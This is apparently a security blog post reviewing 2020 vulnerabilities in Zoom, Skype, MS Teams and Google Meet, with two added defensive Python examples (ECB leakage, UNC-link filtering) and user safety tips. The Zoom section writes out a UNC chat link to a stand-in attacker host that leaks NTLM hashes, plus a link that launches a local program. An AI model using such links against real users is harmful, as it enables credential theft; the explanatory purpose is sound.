Video Services Security

The basic requirements for video conferencing services are quality, reliability and security. While the first two are broadly comparable across all major players, the security situation differs significantly. In this post, we’ll look at how protection works in the most widely used services: Zoom, Skype, Microsoft Teams and Google Meet.

Since the start of the pandemic, all video conferencing services have experienced explosive growth in the number of users:
• the number of daily Skype users increased by 70% in just one month,
• the number of MS Teams users has grown 5 times since January and reached 75 million people,
• the number of Zoom users increased 30 times in 4 months and exceeded 300 million people a day,
• since January 2020, the number of daily users of the Google (Hangouts) Meet application has grown 30 times and now stands at 100 million people.

The increase in the value of Zoom Video shares since the pandemic began. Source: Investing.com

However, the mass demand not only drove stock growth but also clearly exposed security problems in these services that, for some reason, no one had thought about before. Some of the problems stem from the quality of the programmers’ work and can lead to remote code execution. Others stem from flawed architectural decisions that make malicious use of the service possible.

Zoom

Zoom Video literally burst into the video conferencing market and quickly became a leader. Unfortunately, it led not only in the number of users but also in the number of errors detected. The situation was so bad that military and government departments in many countries forbade employees to use the problematic product; large companies followed suit. Let’s look at the Zoom vulnerabilities that led to these decisions.

Encryption Issues

Zoom declares that all video calls are protected by encryption, but the reality is less rosy: the service does use encryption, but the client program requests the session key from one of the servers of the “key management system” that is part of Zoom’s cloud infrastructure. These servers generate an encryption key and give it to the subscribers who connect to the conference: one key for all conference participants.

The key is transmitted from the server to the client over TLS, the same protocol that is used for HTTPS. If one of the conference participants uses Zoom on a phone, a copy of the encryption key is also transferred to another server, the Zoom telephony connector.
Some of the key management system servers are located in China, and they are used to issue keys even when all conference participants are in other countries. There are justifiable fears that the PRC government may intercept encrypted traffic and then decrypt it using keys obtained from providers on a voluntary basis.
Another encryption problem is related to its practical implementation:
• although the documentation states that 256-bit AES keys are used, their actual length is only 128 bits;
• the AES algorithm works in ECB mode, in which the encryption result partially preserves the structure of the source data.

The result of image encryption using ECB mode and other AES modes. Source: Wikipedia
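Why ECB preserves the structure of the source data, as an added example that is not part of the original post. The standard library has no AES, so a small Feistel permutation built on HMAC-SHA256 stands in for the block cipher (an assumption of this sketch); the key and the "frame" are constructed sample values.

```python
import hashlib
import hmac
from collections import Counter

BLOCK = 16  # AES block size in bytes

def _round(key, i, half):
    # Keyed round function of the stand-in cipher (HMAC-SHA256, truncated to 8 bytes).
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:BLOCK // 2]

def toy_block_encrypt(key, block):
    # 4-round Feistel permutation on 16-byte blocks. NOT AES: a stand-in so the
    # example runs offline. Like AES, it maps equal inputs to equal outputs.
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, bytes(a ^ b for a, b in zip(left, _round(key, i, right)))
    return left + right

def encrypt_ecb(key, data):
    # ECB: every block is encrypted independently with the same key.
    assert len(data) % BLOCK == 0
    return b"".join(toy_block_encrypt(key, data[i:i + BLOCK])
                    for i in range(0, len(data), BLOCK))

def encrypt_ctr(key, nonce, data):
    # CTR: each block is XORed with E(nonce || counter), so equal plaintext
    # blocks produce different ciphertext blocks.
    out = bytearray()
    for n, i in enumerate(range(0, len(data), BLOCK)):
        keystream = toy_block_encrypt(key, nonce + n.to_bytes(8, "big"))
        out += bytes(a ^ b for a, b in zip(data[i:i + BLOCK], keystream))
    return bytes(out)

def repeated_blocks(ciphertext):
    # Number of ciphertext blocks whose value occurs more than once.
    counts = Counter(ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK))
    return sum(c for c in counts.values() if c > 1)

# Constructed sample: a uniform "background" with one distinct 16-byte region.
KEY = b"constructed-demo-key"
FRAME = b"\x00" * BLOCK * 6 + b"meeting-secret!!" + b"\x00" * BLOCK * 5

if __name__ == "__main__":
    print("ECB repeated blocks:", repeated_blocks(encrypt_ecb(KEY, FRAME)))
    print("CTR repeated blocks:", repeated_blocks(encrypt_ctr(KEY, b"\x00" * 8, FRAME)))
```

An observer who sees only the ECB ciphertext can tell which blocks of the frame are identical, which is the outline effect visible in the image above.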

The 500 thousand dollar vulnerability

In mid-April 2020, two zero-day vulnerabilities were discovered in the Zoom clients for Windows and macOS. The RCE vulnerability in the Windows client was immediately put up for sale for 500 thousand US dollars. To exploit the error, the attacker must call the victim or be in the same conference with them.
The vulnerability in the macOS client did not offer such opportunities, so its use in real attacks is unlikely.

Responses to unauthorized XMPP requests

At the end of April 2020, another vulnerability was discovered in Zoom: using a specially crafted XMPP request, anyone could get a list of all service users belonging to any domain. For example, you could get a list of user addresses from the usa.gov domain by sending an XMPP request of the form:

 
	 
	 
	

The application simply did not check the domain of the user requesting the address list.

Taking control of macOS

Two vulnerabilities were found in the Zoom client for macOS that allowed an attacker to take control of a device.

1) The Zoom installer used the shadow installation technique, which is often used by malicious programs to install without user interaction. A local, unprivileged attacker could inject malicious code into the Zoom installer and gain root privileges.
2) By injecting malicious code into the installed Zoom client, the attacker could gain access to the camera and microphone permissions already granted to the application. No additional requests or notifications would be displayed.

UNC vulnerability in the Windows client

A vulnerability discovered in the Zoom client for Windows could lead to a leak of user credentials through UNC links. The reason is that the Zoom Windows client converts UNC paths into links, so if you send a link like \\evil.com\img\kotik.jpg to the chat, Windows will try to connect to this site using the SMB protocol to open the file kotik.jpg. The remote site will receive the username and NTLM hash from the local computer, and the hash can be cracked using the Hashcat utility or other tools.
Using this technique, one could run almost any program on the local computer. For example, the link \\127.0.0.1\C$\windows\system32\calc.exe will start the calculator.
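One way a chat client can avoid this class of bug, as an added example that is not Zoom's code: make only http(s) URLs clickable and treat UNC paths as plain text that can be logged. The function names, the regular expression and the sample message are constructed for this sketch.

```python
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# \\host\share\... or //host/share/... (both forms reach SMB on Windows)
UNC_RE = re.compile(r"^(?:\\\\|//)[^\\/\s]+[\\/][^\s]+")

def classify_token(token):
    """Return 'link', 'unc' or 'text' for one whitespace-delimited chat token."""
    if UNC_RE.match(token):
        return "unc"
    try:
        parts = urlsplit(token)
    except ValueError:          # malformed URL, e.g. a broken IPv6 literal
        return "text"
    if parts.scheme.lower() in ALLOWED_SCHEMES and parts.netloc:
        return "link"
    return "text"               # file://, smb://, bare words: never clickable

def render_message(message):
    """Classify every token; only 'link' tokens would be rendered as hyperlinks."""
    return [(classify_token(tok), tok) for tok in message.split()]

def unc_hosts(message):
    """Hosts referenced by UNC paths in a message, for logging or alerting."""
    hosts = []
    for kind, tok in render_message(message):
        if kind == "unc":
            hosts.append(re.split(r"[\\/]", tok.lstrip("\\/"))[0])
    return hosts

# Constructed sample message (example.test is a reserved test domain).
SAMPLE = r"see \\files.example.test\img\cat.jpg and https://example.test/agenda"

if __name__ == "__main__":
    for kind, tok in render_message(SAMPLE):
        print(f"{kind:5} {tok}")
    print("UNC hosts:", unc_hosts(SAMPLE))
```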

Video Call Leaks

At the beginning of April, recordings of Zoom users’ personal video calls appeared on YouTube and Vimeo. These included school lessons, psychotherapy sessions and medical consultations, as well as corporate meetings.
The reason for the leak was that the service assigned open identifiers to video conferences, and the conference organizers did not protect access to them with a password. Anyone could download the recordings and use them at their discretion.

Zoombombing

This is a case where insufficient attention to the default security settings for conferences leads to sad consequences. To connect to any video call in Zoom, it was enough to know the meeting identifier, and pranksters began to exploit this on a large scale. They burst into online lessons and practiced a peculiar kind of “wit” there, for example, starting a screen share with a porn movie or scribbling obscene images over a document on the teacher’s screen.
Then it turned out that the problem was much wider than just the disruption of online lessons. Journalists at The New York Times found private chats and threads on the Reddit and 4Chan forums whose participants ran massive campaigns to disrupt public events, online meetings of Alcoholics Anonymous and other Zoom meetings. They looked for connection details published in the public domain and then invited other trolls to join the “fun”.

Correcting the mistakes

Massive refusals to use the service forced Zoom to take emergency measures. In a CNN interview in early April, Zoom CEO Eric Yuan said that the company had been moving too fast, so it made some mistakes. Having learned the lesson, they took a step back to focus on privacy and security.
In accordance with the “90 days to safety” program, on April 1, 2020, Zoom stopped working on new features and began fixing the identified problems and auditing the security of its code.
The result of these measures was the release of Zoom version 5.0, which, among other things, upgraded AES encryption to 256 bits and implemented many other improvements related to default security.

Skype

Despite the rapid growth in the number of users, Skype appeared only once in this year’s information security news, and even that was not due to a vulnerability. In January 2020, a former contractor told The Guardian that for several years Microsoft had listened to and processed the voices of Skype and Cortana users without any security measures. However, this first became known in August 2019, and even then Microsoft representatives explained that voice data is collected to provide and improve voice services: search and recognition of voice commands, speech translation and transcription.

The result of a search in the vulnerability database for Skype. Source: cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Skype

As for vulnerabilities, according to the CVE database, no vulnerabilities were found in Skype in 2020.

MS Teams

Microsoft pays a lot of attention to the security of its products, including MS Teams (although the opposite opinion is widespread). The following vulnerabilities were discovered and fixed in Teams in 2019-2020:
1) CVE-2019-5922 – a vulnerability in the Teams installer that allowed an attacker to plant a malicious DLL and gain rights in the target system, since the installer did not check which DLL was in its folder.
2) A vulnerability in the Microsoft Teams platform that made it possible to compromise a user account using a picture.

Scheme of attack on MS Teams using a picture. Source: www.cyberark.com/resources/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams

The source of the problem was how Teams works with image access tokens. The platform uses two tokens for user authentication: authtoken and skypetoken. The authtoken allows the user to upload images in the Teams and Skype domains and generates a skypetoken, which is used for authentication on the server that processes commands from the client, for example, reading or sending messages.
An attacker who intercepts both tokens can make Teams API calls and gain full control over the account:
• read and send messages,
• create groups,
• add and remove users,
• change permissions.
To intercept them, it was enough to use a GIF file to lure the victim to an attacker-controlled subdomain of the teams.microsoft.com domain. The victim’s browser would then send the authtoken to the attacker, who could use it to create a skypetoken.

3) Several vulnerabilities discovered by Tenable researchers in the component for sending thank-you cards (Praise Cards) and in chat windows. They made it possible to inject code for unauthorized changes to settings, as well as for the theft of user credentials. Microsoft did not issue separate advisories for these problems, fixing them in a new version of the application.

Google Meet

Unlike similar services, Google Meet works entirely in a browser. Thanks to this feature, Google’s video conferencing has not appeared in information security news once over the past two years. Even the 30-fold increase in the number of users caused by the pandemic did not reveal vulnerabilities affecting their security.

Our recommendations

The use of any program requires a responsible attitude to security, and video conferencing tools are no exception. Here are some rules to help protect your online meetings:
1) use the latest version of the software,
2) download program installers only from official resources,
3) do not publish meeting IDs on the Internet,
4) protect your accounts with two-factor authentication,
5) only allow authorized users to connect to meetings,
6) close the possibility of new connections after the start of the event,
7) enable the organizer to block or delete the participants in the meeting,
8) use modern anti-virus solutions that provide comprehensive protection against new and known threats.
Following these rules of online hygiene for video conferencing will allow you to work efficiently and safely even in the most difficult periods.
